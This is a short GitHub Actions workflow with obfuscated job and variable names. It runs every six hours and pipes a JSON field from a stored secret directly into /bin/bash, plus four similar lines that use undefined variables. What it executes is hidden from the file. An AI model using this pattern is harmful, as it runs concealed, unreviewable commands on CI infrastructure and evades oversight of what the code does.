name: dilongmai2376

on:
  workflow_dispatch:
  schedule:
    - cron: '15 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dilongmai2376
        env:
          pc5661: ${{ secrets.pc5661 }}
        run: |
          echo $pc5661 | jq -r .ba55433 | /bin/bash
          echo $vr20 | jq -r .u31 | /bin/bash
          echo $rj04 | jq -r .r20516 | /bin/bash
          echo $xq41133 | jq -r .b135 | /bin/bash
          echo $db76 | jq -r .fe732 | /bin/bash

